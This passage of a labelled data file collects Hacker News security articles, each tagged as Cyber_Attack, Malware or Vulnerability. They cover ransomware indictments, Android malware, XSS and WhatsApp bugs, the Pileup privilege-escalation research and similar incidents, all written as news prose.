The tool of cyber operates via a backdoor (""backdoor"") designed to steal data and give direct access to infected systems.
Development miniFlame could have started as early as 2007 and continued until the end of 2011. Many variants appear to have been created. Today, Kaspersky Lab has identified six key corresponding to two generations 4.x and 5.x.
Unlike Flame or Gauss, responsible for a large number of infections, due to the miniFlame is much lower. According to the data from Kaspersky Lab, it would be limited to 10 or 20 machines. The total number of infections globally is estimated at 50 or 60.
The small number of infections combined with flight capabilities miniFlame information and the flexibility of its design indicates that it has been used for highly targeted cyber espionage operations and has most likely been deployed in machines already infected with Flame or Gauss.
Subscribe to our Daily Newsletter via email - Be First to know about Security and Hackers. or Join our Huge Hackers Community on Facebook, Google+ and Twitter.
",Cyber_Attack
U.S Charges Two Iranian Hackers for SamSam Ransomware Attacks,https://thehackernews.com/2018/11/samsam-ransomware-iranian-hackers.html,"The Department of Justice announced Wednesday charges against two Iranian nationals for their involvement in creating and deploying the notorious SamSam ransomware.
The alleged hackers, Faramarz Shahi Savandi, 34, and Mohammad Mehdi Shah, 27, have been charged on several counts of computer hacking and fraud charges, the indictment unsealed today at New Jersey court revealed.
The duo used SamSam ransomware to extort over $6 million in ransom payments since 2015, and also caused more than $30 million in damages to over 200 victims, including hospitals, municipalities, and public institutions.
According to the indictment, Savandi and Mansouri have been charged with a total of six counts, including one count of conspiracy to commit wire fraud, one count of conspiracy to commit fraud and related activity in connection with computers, two counts of intentional damage to a protected computer, and two counts of transmitting a demand in relation to damaging a protected computer.
Since both hackers live in and operated from Iran, they have not yet been arrested by the United States authorities and the FBI has added them on their list of wanted hackers.
According to the indictment, Savandi and Mansouri created the first version of the SamSam Ransomware in December 2015 and created further refined versions of the threat in June and October 2017.
""Defendants authored various versions of the SamSam Ransomware, which was designed to encrypt data on Victim computers. SamSam Ransomware was designed to maximize the damage caused to the Victim by, for instance, also encrypting backups of the targeted computers,"" the indictment says.
""Defendants used a variety of methods to gain access to Victim computer networks, including exploiting known security vulnerabilities in common server software and utilizing virtual private servers such as European VPS #1 and European VPS #2 to mask their identities.""
Unlike most ransomware infections, SamSam was not distributed in an unplanned way via spam email campaigns. Instead, the attackers chose potential targets and infected systems manually.
Attackers first compromised the RDP on a targeted system—either by conducting brute force attacks or using stolen credentials—and then attempted to strategically deploy SamSam throughout the network by exploiting vulnerabilities in other systems.
Once on the entire network, SamSam encrypts the system's data and demands a huge ransom payment (usually more than $50,000 which is much higher than normal) in Bitcoin in exchange for the decryption keys.
Since December 2015, SamSam has significantly targeted some large organizations, including the Atlanta city government, the Colorado Department of Transportation, several hospitals and educational institutions like the Mississippi Valley State University.
""According to the indictment, [affected victims includes] the City of Atlanta, the City of Newark, the Port of San Diego, the Colorado Department of Transportation, the University of Calgary, Hollywood Presbyterian Medical Centers, Kansas Heart Hospital, MedStar Health, Nebraska Orthopedic Hospital, and Allscripts Healthcare Solutions Inc.""
The Atlanta city's officials refused to pay the ransomware, and the recovery effort cost them estimated $17 million.
Leaving behind other well-known ransomware viruses like WannaCry and NotPetya, SamSam became the largest paid ransomware of its kind with one individual victim paid $64,000.
Since Iran has no extradition policy with the United States, the indictment may not guarantee the extraditions or convictions of the two alleged hackers. But being on the wanted list of the FBI make it difficult for the duo to travel outside their country's boundary freely.
",Malware
TapLogger Android Trojan can Determine Tapped Keys,https://thehackernews.com/2012/04/taplogger-android-trojan-can-determine.html,"TapLogger Android Trojan cab Determine Tapped Keys
Today's smartphones are shipp ed with various embedded motion sensors, such as the accelerometer, gyroscope, and orientation sensors. These motion sensors are useful in supporting the mobile UI innovation and motion-based commands. However, they also bring potential risks of leaking user's private information as they allow third party applications to monitor the motion changes of smart phones.
A team of researchers from Pennsylvania State University (PSU) and IBM have devised an Android-based Trojan that can use a handset's onboard movement sensors to crack passwords.
The team created an experimental app called TapLogger, which is based on the premise that when you tap on your touch screen, you're not just interacting with the screen, but moving the entire device. So if you hit a button in the upper right corner, your phone will actually move in that direction slightly, and that subtle movement is then read by the accelerometer and other sensors built-in to your device.
TapLogger was created by Zhi Xu, a PhD candidate in the Department of Computer Science and Engineering at PSU, Kun Bai, a researcher at IBM T.J. Watson Research Center and Sencun Zhu, an associate professor of Computer Science and Engineering at PSU's College of Engineering.
Accelerometer and orientation sensor data are not protected under Android's security model, and this means that they are exposed to any application, regardless of its permissions on the system, the research team said in a paper that was presented during the ACM Conference on Security and Privacy in Wireless and Mobile Networks on Tuesday.
In August 2011, a pair of researchers from University of California proposed a similar attack and designed a concept application called TouchLogger to demonstrate it.
",Malware
Android Malware can now steal 3D Model Of Your Location,https://thehackernews.com/2012/10/android-malware-can-now-steal-3d-model.html,"It's a fact that as smartphones get more capable, the possibilities for their misuse also increase. They're already exploited by crooks to swipe personal information, but a new Android app created by the U.S. Navy is on another level entirely. It's a scary piece of malware called ""PlaceRaider"" that was developed by the US Naval Surface Warfare center and for now it is being viewed as just a proof of concept.
According to the MIT Technology Review, researchers at Indiana University and the Naval Surface Warfare Center have developed a new form of malware designed to record and reconstruct a victim's environment.
They has just worked out how to infect a mobile phone with a Trojan that can take photos without you knowing anything about it and send sensor data back to a server. The data are used to construct a 3D model which can be used not only to perform the reconnaissance necessary to break in, but also to steal confidential information such as bank details.
On the original page presenting an explanation of the app, the authors note that their work demonstrated ""the effectiveness of using mobile devices as powerful surveillance and virtual theft platforms.""
The software even shuts off the phone's speaker so someone being spied on doesn't hear the typical sound a device emits when a photo is taken. The developers do say that one way to protect yourself against virtual theft apps such as this is by ensuring that you always have antivirus software and that your shutter audio is always on.
",Malware
50 million customers compromised in LivingSocial hack,https://thehackernews.com/2013/04/50-million-customers-compromised-in.html,"LivingSocial, a daily deals website part-owned by Amazon Inc., hit by a cyber attack that may have affected more than 50 million customers and will need to reset their passwords. LivingSocial says it has 70 million members worldwide.
Leaked data includes names, e-mail addresses, dates of birth and encrypted passwords. Customers' credit card information and merchants' financial and banking information were not affected by the hack, LivingSocial said. So it looks like some personal info may have fallen into the wrong hands, but credit card and other financial details should be safe.
The cyberattack affected LivingSocial customers in North America, Australia, New Zealand, United Kingdom, Ireland and Malaysia and its LetsBonus users in Southern Europe and Latin America.
So if you're among the affected users, the hackers have just the right amount of information to phish you. The site is sending out emails to customers advising them to change their passwords.
",Cyber_Attack
Operation Ghost Click by FBI - Online advertising scam taken Down,https://thehackernews.com/2011/11/operation-ghost-click-by-fbi-online.html,"Operation Ghost Click by FBI - Online advertising scam taken Down
A gang of internet 'cyber bandits' who stole $14 million after hacking into at least 4 million computers in an online advertising scam have been arrested following a joint investigation by the FBI and Nasa. Six men are in custody in Estonia, pending extradition to the United States, following a two-year investigation into an ""intricate international conspiracy"" that ""hijacked"" millions of computers around the world and stole more than US$14-million. The FBI's two-year investigation was dubbed ""Operation Ghost Click"".
Computers in more than 100 countries were infected by the ""DNSChanger"" malware, which redirected searches for Apple's iTunes store to fake pages pretending to offer Apple software for sale, as well as sending those searching for information on the U.S. Internal Revenue Service to accounting company H&R Block, which allegedly paid those behind the scam a fee for each visitor via a fake internet ad agency.
""These defendants gave new meaning to the term 'false advertising',"" said Manhattan US Attorney Preet Bharara. ""As alleged, they were international cyber bandits who hijacked millions of computers at will and re-routed them to websites and advertisements of their own choosing, collecting millions in undeserved commissions for all the hijacked computer clicks and internet ads they fraudulently engineered.""
Here's some screenshots from the FBI's ""Check to See if Your Computer is Using Rogue DNS"" instructions.
Trend Micro, which helped supply information to the FBI on DNS Changer, hailed the law enforcement operation as the ""biggest cyber criminal takedown in history."" Whilst the rogue DNS servers have been replaced, many may still be infected. Head here to learn about how to check if your system is part of the DNS Changer botnet.
",Malware
Skype privacy bug that can Send Messages To The Wrong Contacts,https://thehackernews.com/2012/07/skype-privacy-bug-that-can-send.html,"What if when you sent a message to someone, it had a very good chance of going to someone else in your contact list? That would be pretty scary right? That what some Skype users are reporting.
The bug was first discussed in Skype's user forums, and seems to have followed a June 2012 update of the Skype software. Skype has confirmed the bug existence and that a fix is in the works. However, the company characterizes the bug as ""rare.""
Purchased by Microsoft last year for $8.5 billion, the Luxemburg company which has as many as 40 million people using its service at a time during peak periods, explained that messages sent between two users were in limited cases being copied to a third party, but did not elaborate further on the matter.
Five other individuals of the Microsoft-owned program confirmed they were also seeing instant messages being sent to the wrong person from their contact list. Sometimes it's just a few messages, while other times it's a whole conversation.
Skype has, on its blog, confirmed the issue of a bug sending instant messages to wrong contacts and has promised a fix. Addressing the issue, Skype wrote, ""Based on recent Skype customer forum posts and our own investigation over the past couple of days, we have identified a bug that we are working hard to fix.""
",Vulnerability
myOpenID XSS : One of the Largest OpenID provider is Vulnerable,https://thehackernews.com/2011/11/myopenid-xss-one-of-largest-openid.html,"myOpenID XSS : One of the Largest OpenID provider is Vulnerable
One of the One of the Largest Independent OpenID provider ""myOpenID"" is Vulnerable to Cross Site Scripting (XSS) ,Discovered by ""SeeMe"" - Member of Inj3ct0r Team. Cross Site Scripting (or XSS) is one of the most common application-layer web attacks.
What Hacker can do - ""The attackers can steal the session ID of a valid user using XSS. The session ID is very valuable because it is the secret token that the user presents after login as proof of identity until logout. If the session ID is stored in a cookie, the attackers can write a script which will run on the user's browser, query the value in the cookie and send it to the attackers. The attackers can then use the valid session ID to browse the site without logging in. The script could also collect other information from the page, including the entire contents of the page"".
Proof Of Concept - Click Here
",Vulnerability
Phone Phreaking using Bluebox Demonstrated in India,https://thehackernews.com/2012/04/phone-phreaking-using-bluebox.html,"Phone Phreaking using Bluebox Demonstrated in India
Christy Philip Mathew, an Indian Information Security Instructor and Hacker demonstrated Phone Phreaking using Bluebox in his lab. This time we have something really special that would remind us the phone phreaking. Actually Phone Phreaking reminds us about the life of Kevin Mitnick, Steve Wozniak and John Drapper, mean the olden times when they used to play around with the bluebox.
What is Blue Box: This device is certainly one of the most unique pieces of electronic equipment that I have been able to collect so far. It is essentially a hacking tool disguised to look like a common 1970's Texas Instruments hand held electronic calculator. Basically a real calculator was sacrificed and modified to produce audio frequency signaling tones which allowed the user to freely (and illegally) access the Bell Telephone System long distance network.
The origin of the name ""blue box"" was due to the fact the some of the earliest home built versions were actually housed in blue boxes. Below is a 1970's photo found on the web showing a happy phone phreak in action with such a device.
That was just awesome and worked in the times of Mitnick. Christy Philip Mathew always used to explain these to his students but never got a chance to prove it.
One day he was just checking up his bank accounts and he came across a deduction of some amount without any reason. So he thought to call up the customer care department to make sure what exactly is going around with his account. They said bla bla bla .... Hell out of excuses. So he used to call up the customer care department more than 3 to 4 times a day to know the status of my account deduction. Every time he had to verify his Customer Identification Number and the Mobile Number before he get connected to the Customer care department. This way, He had been repeating the steps the same time again and again. In simple terms tones gets generated every single time and he was completely tired with it. So he thought of having fun around and test up something what if he record the tones generated for his mobile number and customer identification number and play it when it ask him for.
Yes, He is talking about the blue-box kind of Application via Android Phone with the help of it. So here he use ToneDef, is a small, but powerful tone dialer application featuring DTMF, bluebox, and redbox tone generation.
Next day he dialed up the customer care and when they asked him to verify by dialing my mobile number he just played the recorded tones using an android application. Finally Customer Care system got it accepted that instant and now they ask him for Customer Identification Number, So again he played the second recorded tone respectively.
On the very next day Christy Philip Mathew contacted me ( Mohit, Founder - The Hacker News ) and we decided to try this on a Public Booth to check the idea that weather we are able to call from Public booth without inserting the coin or not ? Sudden Christy plan to buy a coin operated phone terminal from eBay. It took around like 8 to 10 days to get his package.
At last Christy demonstrate the Concept and Here below in the video you can see Proof of Concept:
1.) Coin Operated Phone Terminal
2.) Customer Care Department:
3.) Land Line Phone
",Vulnerability
British Baptist Minister's son charged with hacking US Army and Nasa Computer Systems,https://thehackernews.com/2013/10/british-baptist-ministers-son-charged.html,"Son of a Baptist Minister, 28-year-old British man named Lauri Love has been charged with hacking into the computer systems of the US army, NASA and other federal agencies.
He was arrested Friday at his home in Stradishall, England by the National Crime Agency and according to the indictment alleges Love and his unnamed co-conspirators hacked into thousands of computer systems between October 2012 and October 2013. The indictment does not accuse Love of selling information or doing anything else with it for financial gain.
His father Alexander Love, 60, a Baptist minister, works as a chaplain at HMP Highpoint North. His mother Sirkka-Liisa Love, 59, also works at the jail as a teacher.
He is charged with one count of accessing a U.S. Department or agency computer without authorization and one count of conspiracy. The government said the purpose was to disrupt the operations and infrastructure of the federal government. They stole data on more than 5,000 individuals, as well as information on government budgets and procurement processes.
Love is alleged to have used the online monikers ""nsh"", ""route"", and ""peace"" to plot attacks from his home with three unnamed conspirators in Australia and Sweden and US authorities declined to discuss whether they had been arrested or will be arrested and extradited to the US.
""You have no idea how much we can fuck with the US government if we wanted to,"" Love told a hacking colleague in one exchange over Internet relay chat, prosecutors alleged. ""This... Stuff is really sensitive. It's basically every piece of information you'd need to do full identity theft on any employee or contractor"".
Love could be extradited to the US, where if convicted he faces up to ten years in prison and a fine for twice the damage caused. Gary McKinnon's mother, Janis Sharp, accused US authorities of targeting young British geeks, said ""They are just young geeks sitting in their bedrooms; they're not murderers, they're not terrorists, they're not selling secrets, they're just searching for information,"".
He has been released on bail until February and could face a maximum potential penalty of five years in prison and a $250,000 fine for each count.
",Cyber_Attack
Over 1 Million Google Accounts Hacked by 'Gooligan' Android Malware,https://thehackernews.com/2016/11/hack-google-account.html,"If you own an Android smartphone, Beware! A new Android malware that has already breached more than 1 Million Google accounts is infecting around 13,000 devices every day.
Dubbed Gooligan, the malware roots vulnerable Android devices to steal email addresses and authentication tokens stored on them.
With this information in hands, the attackers are able to hijack your Google account and access your sensitive information from Google apps including Gmail, Google Photos, Google Docs, Google Play, Google Drive, and G Suite.
Researchers found traces of Gooligan code in dozens of legitimate-looking Android apps on 3rd-party app stores, which if downloaded and installed by an Android user, malware starts sending your device's information and stolen data to its Command and Control (C&C) server.
""Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153),"" researchers said in a blog post.
""If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely.""
According to CheckPoint security researchers, who uncovered the malware, anyone running an older version of the Android operating system, including Android 4.x (Jelly Bean, KitKat) and 5.x, (Lollipop) is most at risk, which represents nearly 74% of Android devices in use today.
""These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user,"" researchers added.
Once hack into any Android device, Gooligan also generates revenues for the cyber criminals by fraudulently buying and installing apps from Google Play Store and rating them and writing reviews on behalf of the phone's owner. The malware also installs adware to generate revenue.
How to check if your Google account has been compromised with this malware?
Check Point has published an online tool to check if your Android device has been infected with the Gooligan malware. Just open 'Gooligan Checker' and enter your Google email address to find out if you've been hacked.
If you found yourself infected, Adrian Ludwig, Google's director of Android security, has recommended you to run a clean installation of the operating system on your Android device.
This process is called 'Flashing,' which is quite a complicated process. So, the company recommends you to power off your device and approach a certified technician or your mobile service provider in order to re-flash your device.
",Malware
"New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers",https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html,"A financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research.
Deployed by the China-based cybercrime group Rocke, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers said in a Thursday write-up.
""Pro-Ocean uses known vulnerabilities to target cloud applications,"" the researchers detailed. ""In our analysis, we found Pro-Ocean targeting Apache ActiveMQ (CVE-2016-3088), Oracle WebLogic (CVE-2017-10271) and Redis (unsecure instances).""
""Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently.""
First documented by Cisco Talos in 2018, Rocke has been found to distribute and execute crypto-mining malware using a varied toolkit that includes Git repositories and different payloads such as shell scripts, JavaScript backdoors, as well as portable executable files.
While prior variants of the malware banked on the capability to target and remove cloud security products developed by Tencent Cloud and Alibaba Cloud by exploiting flaws in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion, Pro-Ocean has expanded the breadth of those attack vectors by aiming at Apache ActiveMQ, Oracle WebLogic, and Redis servers.
Besides its self-spreading features and better hiding techniques that allow it to stay under the radar and spread to unpatched software on the network, the malware, once installed sets about uninstalling monitoring agents to dodge detection and removing other malware and miners from the infected systems.
To achieve this, it takes advantage of a native Linux feature called LD_PRELOAD to mask its malicious activity, a library named Libprocesshider to stay hidden, and uses a Python infection script that takes the machine's public IP to infect all machines in the same 16-bit subnetwork (e.g., 10.0.X.X).
Pro-Ocean also works to eliminate competition by killing other malware and miners, including Luoxk, BillGates, XMRig, and Hashfish, running on the compromised host. In addition, it comes with a watchdog module written in Bash that ensures persistence and takes care of terminating all processes that utilize more than 30% of the CPU with the goal of mining Monero efficiently.
""This malware is an example that demonstrates that cloud providers' agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,"" Unit 42 researcher Aviv Sasson said. ""This sample has the capability to delete some cloud providers' agents and evade their detection.""
",Malware
Widespread Instagram Hack Locking Users Out of Their Accounts,https://thehackernews.com/2018/08/hack-instagram-accounts.html,"Instagram has been hit by a widespread hacking campaign that appears to stem from Russia and have affected hundreds of users over the past week, leaving them locked out of their accounts.
A growing number of Instagram users are taking to social media, including Twitter and Reddit, to report a mysterious hack which involves locking them out of their account with their email addresses changed to .ru domains.
According to victims, their account names, profile pictures, passwords, email addresses associated with their Instagram accounts, and even connected Facebook accounts are being changed in the attack.
Many of the affected Instagram users are also complaining about their profile photos replaced with stills from popular films, including Despicable Me 3 and Pirates of the Caribbean.
Although it is still unknown who is behind the widespread hack of Instagram accounts, the use of the email addresses originating from Russian email provider mail.ru may indicate a Russian hacker or hacking group is behind the attack, or perhaps hackers pretending to be from Russia.
First spotted by Mashable, the hack even affected Instagram users with two-factor authentication (2FA) enabled, as at least one user told Mashable that he was using 2FA, but it did nothing to stop his account from being hacked. However, it is currently unconfirmed.
In response to the report, Instagram published a blog post saying that the company continues to investigate the issue and that it has ""dedicated teams helping people to secure their accounts.""
""We are aware that some people are having difficulty accessing their Instagram accounts,"" Instagram says, pointing users to its guidance on hacked accounts to help keep their account secure.
The company advises Instagram users to keep a secure password with at least six numbers and/or letters, enable 2FA for additional security, and to revoke any suspicious third-party app that might have access to their accounts.
Instagram currently relies on text messages for two-factor authentication, which is believed to be less secure than other app-based 2FA methods, but the Facebook-owned company says it is working on improving its 2FA settings.
However, since the unknown technique being used by attackers to hack Instagram accounts is still unaddressed, there's nothing much you can do if the suspected loophole can also bypass two-factor authentication.
The motive behind the attacks is still unknown, but it appears that the attacks on Instagram are still happening at the time of writing.
For more information, users are recommended to visit the Instagram Help Centre dedicated to hacked accounts, which includes security tips as well as steps they can take to restore their account.
",Vulnerability
Hacking Smart Electricity Meters To Cut Power Bills,https://thehackernews.com/2014/10/hacking-smart-electricity-meters-to-cut.html,"Smart devices are growing at an exponential pace with the increase in connecting devices embedded in cars, retail systems, refrigerators, televisions and countless other things people use in their everyday life, but security and privacy are the key issues for such applications, which still face some enormous number of challenges.
Millions of Network-connected electricity meters or Smart meters used in Spain are susceptible to cyberattack by hackers due to lack of basic and essential security controls that could put Millions of homes at risk, according to studies carried out by a pair of security researcher.
HACKERS TO CAUSE BLACKOUT AND BILL FRAUD
The security vulnerabilities found in the electricity meters could allow an intruder to carry out billing fraud or even shut down electric power to homes and cause blackouts.
Poorly protected credentials inside the devices could let attackers take control over the gadgets, warn the researchers. The utility that deployed the meters is now improving the devices' security to help protect its network.
During an interview on Monday, the security researchers, Javier Vazquez Vidal and Alberto Garcia Illera, said the vulnerability affects smart meters installed by a Spanish utility company, the one on which the Spanish government relied in order to improve national energy efficiency.
The research carried out by the duo researchers will soon be presented at Black Hat Europe hacking conference in Amsterdam next week. The duo will explain on how they reverse engineered smart meters and found blatant security weaknesses that allowed them to commandeer the devices to shut down power or perform electricity usage fraud over the power line communications network.
SMART METER'S REPROGRAMMABLE MEMORY RUNS FLAWED CODE
The Vulnerability resides in the memory chips of the smart meters, which are reprogrammable and contain flawed code that could be exploited to remotely shut down power supplies to individual households, tamper meter readings, transfer meter readings to other customers and insert ""network worms"" that could leave millions of homes without power causing widespread blackouts.
Though the researchers will not provide any detail explanation on what they actually did, until the problems are fixed by the Smart meter vendor. ""We are not releasing the exact details; we are not going to say how we did this,"" Garcia Illera, a security expert involved in the smart meter research, told Reuters. ""This issue has to be fixed.""
WEAK ENCRYPTION USED
According to the two researchers, the Smart meters use relatively easy to crack symmetric AES-128 encryption, which was designed to secure communications and prevent tampering with billing systems by fraudsters.
There are three major utility companies in Spain — Endesa, Iberdrola and E.ON and collectively 8 million Smart meters have been installed on over 30 percent of households. However, the two haven't yet disclosed the specific smart meter manufacturer at this time.
The duo said they could take full control of the meter box, switch its unique ID to impersonate other customer boxes or turn the meter itself into a weapon for launching attacks against the power network.
""Oh wait? We can do this? We were really scared,"" said Vazquez Vidal, another security expert involved in the smart meter research. ""We started thinking about the impact this could have. What happens if someone wants to attack an entire country?"" he said.
Internet of Things (IoTs) promise to make life easier in countless ways, but as with any technology seeing an upswing, it's to be expected that there will be associated security issues and challenges and this was what happened with the Smart meters in Spain.
",Vulnerability
Crash Your Friends' WhatsApp Remotely with Just a Message,https://thehackernews.com/2014/12/crash-your-friends-whatsapp-remotely_1.html,"A Vulnerability has been discovered in the wildly popular messaging app WhatsApp, which allows anyone to remotely crash WhatsApp just by sending a specially crafted message, two security researchers reported 'The Hacker News'.
Two India based independent security researchers, Indrajeet Bhuyan and Saurav Kar, both 17-year old teenagers demonstrated the WhatsApp Message Handler vulnerability to one of our security analyst.
In a video demonstration, they showed that how a 2000 words (2kb in size) message in special character set can crash Whatsapp messenger app. Previous it was discovered that sending a huge message ( greater than 7mb in size) on Whatsapp could crash victim device and app immediately, but using this new exploit attacker only need to send a very small size (approx 2kb) message to the victim.
The worried impact of the vulnerability is that the user who received the specially crafted message will have to delete his/her whole conversation and start a fresh chat, because opening the message keeps on crashing WhatsApp unless the chat is deleted completely.
""What makes it more serious is that one needs to delete entire chat with the person they are chatting to in order to get back whatsapp work in normal,"" Bhuyan told THN in an e-mail.
According to the duo, the reported vulnerability has been tested and successfully works on most of the versions of Android Operating system including Jellybean, Kitkat, and all the below android versions.
Similarly, Any member of your WhatsApp group could intentionally send a specially crafted message to exit people from the group and delete the group. Also, for example, if I don't want someone to keep records of my chat with them, then I can also send the same message exploit to the person.
The vulnerability has not been tested on iOS, but it is sure that all versions of WhatsApp including 2.11.431 and 2.11.432 are affected with this bug. Also the attack does not work on Windows 8.1.
They have also provided the Proof-of-Concept (PoC) video for the attack, users can watch above.
WhatsApp, bought by Facebook for $19 billion in February this year, has 600 Million users as of October 2014, and according to the researchers, an estimated number of users affected by the vulnerability could be 500 Million.
WhatsApp was in news recently for making end-to-end encryption on all text messages as a default feature in an effort to boost the online privacy and security of its users around the world. The app maker describe this move as the ""largest deployment of end-to-end encryption ever.""
",Vulnerability
"Rakabulle, Advance File Binder from DarkComet RAT Developer",https://thehackernews.com/2014/01/rakabulle-advance-file-binder-from.html,"I hope you all still remember the famous and powerful Remote Administration Tool (RAT) called 'Dark Comet', developed by a French computer geek 'Jean-Pierre Lesueur', also known as 'DarkCoderSc'.
However, He had closed the Dark Comet project, when the Syrian government found to be using it to track down and to spy on their people. After that DarkCoderSc started working under a new banner 'Phrozen Software' to develop many new security softwares and penetration testing tools.
Just yesterday, Jean-Pierre and his team-mate Fabio Pinto from French University, have released a new tool called 'Rakabulle', a file binder with some cool features for penetration testers and malware researchers.
File binder is an application that allows a user to bind multiple files together, resulting in a single executable file. When you execute that single application, all previous merged files will be extracted to a temporary location, and will be executed normally.
""The builder Rakabulle application will create a stub and inject in its resource the target files to extract and execute. The stub is the little generate part of the program which is designed to extract from its resource the target files to a temporary location and execute. In our application the stub also got a part to inject in Explorer or Internet Explorer process and load custom made plugins.
Video Demo:
Listed features are:
File binder, auto file extractor and executor.
REM (Remote Code Execution), Execute code (Plugins) in target process (Explorer or Internet Explorer)
Support 32 and 64 Process.
The application is a 32bit Application (Soon we will compile the 64bit version)
Support UPX compression for the stub (Without compression stub size is about 38KiB using pure Windows API no extra libraries; with compression stub size is approximately 16KiB) The UPX compression doesn't change the way the application work only the final size.
Support Windows startup.
Doesn't require administrative privileges.
Plugins and File list support drag and drop.
Support plugins with an open source example.
The stub and the builder are coded using Unicode encoding.
The file binder application is available for Free to download from Rakabulle website.
",Malware
Fake WeChat App Targeting Android Users with Banking Trojan,https://thehackernews.com/2014/05/fake-wechat-app-targeting-android-users.html,"After Whatsapp, The Chinese WeChat is the second most popular messaging application and currently being targeted by cybercriminals to spread a new Banking Trojan in order to steal the financial information from its users.
WeChat is a famous mobile instant messaging app developed by Chinese company Tencent, with more than 355 million users across the world. The app offers people to chit-chat with their friends and relatives, and also allows users to make payments for goods and services on WeChat.
The Payment feature of the app requires users' bank account details to their messenger account and this is what tempting cybercriminals to develop new and more sophisticated banking Trojans and malwares.
The security researchers at Kaspersky Lab have uncovered such banking Trojan, dubbed as Banker.AndroidOS.Basti.a, which looks exactly like the legitimate WeChat application for Android devices. While installation, it also requires the same permissions such as to access the Internet, received SMSs, and other services just like the real Wechat app.
Researchers found that some modules of the malware app are encrypted and this feature makes it different and sophisticated from other Mobile banking malwares. The malware authors have used an effective encryption in order to prevent Banker.AndroidOS.Basti.a trojan from reverse engineering of the code.
However, the Kaspersky researchers have successfully managed to decode the threat module and found that the malware is capable to perform various types of malicious tasks, including its more professional GUI, which makes it an efficient phishing tool.
Once the malicious WeChat app installed on the victims' android devices, they are served a page asking to enter some useful information including their phone numbers, payment card numbers, PINs and other financial data.
As soon as a victim provides the personal details to the fake app, it sends them back to an email account controlled by the malware author. ""This Trojan-Banker also registered a BootReceiver. It will monitor newly received text messages and uninstall broadcasts from the infected mobile."" they noticed.
The email account name and password details are hard-coded in the source code of the trojan and researchers have successfully retrieved it. They logged into the attackers email account and found that the banking trojan has already made lots of victims.
As the online apps are becoming more popular among the people, hence becoming an easy and a tempting target for cyber thieves. So, its up to you to better safeguard your data privacy.
Make sure that you have installed a reputed mobile security software in your devices. Always update your software applications to the latest version and avoid providing your sensitive information to any suspicious websites or downloading any app from any untrusted source.
",Malware
Android Privilege Escalation Flaws leave Billions of Devices vulnerable to Malware Infection,https://thehackernews.com/2014/03/android-privilege-escalation-flaws.html,"Android - a widely used Smartphone platform offered by Google is once again suspected to affect its users with malicious software that puts their android devices at risk. This time the vulnerabilities occur in the way Android handle the updates to add new flavors to your device.
Researchers from Indiana University and Microsoft have discovered [Paper PDF] a new set of Android vulnerabilities that is capable to carry out privilege escalation attacks because of the weakness in its Package Management Service (PMS) that puts more than one billion Android devices at risk.
The researchers dubbed the new set of security-critical vulnerabilities as Pileup flaws which is a short for privilege escalation through updating, that waylays inside the Android PMS and intensifies the permissions offered to malicious apps whenever an android update occurs, without informing users.
The research was carried out by Indiana University Bloomington researchers, Luyi Xing, Xiaorui Pan, Kan Yuan and XiaoFeng Wang, with the help of Rui Wang of Microsoft.
Six different Pileup vulnerabilities have been found by the researchers within the Android PMS, those are present in all Android Open Source Project versions, including more than 3,500 customized versions of Android developed by handset makers and carriers.
""Every few months, an update is released, which causes replacement and addition of tens of thousands of files on a live system. Each of the new apps being installed needs to be carefully configured to set its attributes within its own sandboxes and its privileges in the system, without accidentally damaging existing apps and the user data they keep,"" the researchers wrote. ""This complicates the program logic for installing such mobile updates, making it susceptible to security-critical flaws.""
The researchers also found that by exploiting the Pileup vulnerabilities, a hacker can not only control the system permission and signature but also their settings. Moreover an attacker could use the malicious app to access and steal the device data, including, sensitive user information such as activity logs, user credentials, Contacts, Messages etc.
""A distinctive and interesting feature of such an attack is that it is not aimed at a vulnerability in the current system. Instead, it exploits the flaws in the updating mechanism of the ""future"" OS, which the current system will be upgraded to,"" the researchers wrote. ""More specifically, though the app running on a lower version Android, the adversary can strategically claim a set of carefully selected privileges or attributes only available on the higher OS version.""
In short, it means that, if an attacker sends the malicious app update and if the permission don't exist in the older version of the android that is added to the new version; the malicious app will silently acquire the permissions and when the device is upgraded to the newer version, the pileup flaws will be automatically exploited.
""A third-party package attribute or property, which bears the name of its system counterpart, can be elevated to a system one during the updating shuffle-up where all apps are installed or reinstalled, and all system configurations are reset,"" the researcher wrote. ""Also, when two apps from old and new systems are merged as described above, security risks can also be brought in when the one on the original system turns out to be malicious.""
During the update, first the PMS will install all new and existing system apps and then will proceed to install third party apps from the old OS and during the installation of malicious app packed inside PMS, the device will recognize and silently grants all the permissions that malicious app requests, as it supposes that these permissions are with an existing app and have already been approved by the user.
""With the help of a program analyzer, our research discovered 6 such Pileup flaws within Android Package Manager Service and further confirmed their presence in all AOSP (Android Open Source Project) versions and all 3,522 source code versions customized by Samsung, LG and HTC across the world that we inspected, which strongly indicates their existence in all Android devices in the market.""
Moreover detecting the critical flaws, the researchers have developed a new scanner app called SecUP that search for malicious apps already on a device designed to exploit Pileup vulnerabilities. Scanning tool inspects already installed Android application packages (APKs) on the device, in an attempt to identify those that will cause privilege escalations during an update, the paper stated.
The SecUP scanning tool consists of an automated vulnerability detector, a program verification tool for Java that discovers the Pileup flaws within the source code of different Android versions and a threat analyzer that automatically scans thousands of OS images.
""The detector verifies the source code of PMS (from different Android versions) to identify any violation of a set of security constraints, in which we expect that the attributes, properties (name, permission, UID, etc.) and data of a third-party app will not affect the installation and configurations of system apps during an update,"" the researchers explained. ""A Pileup flaw is detected once any of those constraints are breached.""
All the six vulnerabilities have been reported to Google by the researchers, from which one of it has been fixed by them.
",Vulnerability
URL redirection Vulnerability in Google & Facebook,https://thehackernews.com/2012/01/url-redirection-vulnerability-in-google.html,"URL redirection Vulnerability in Google
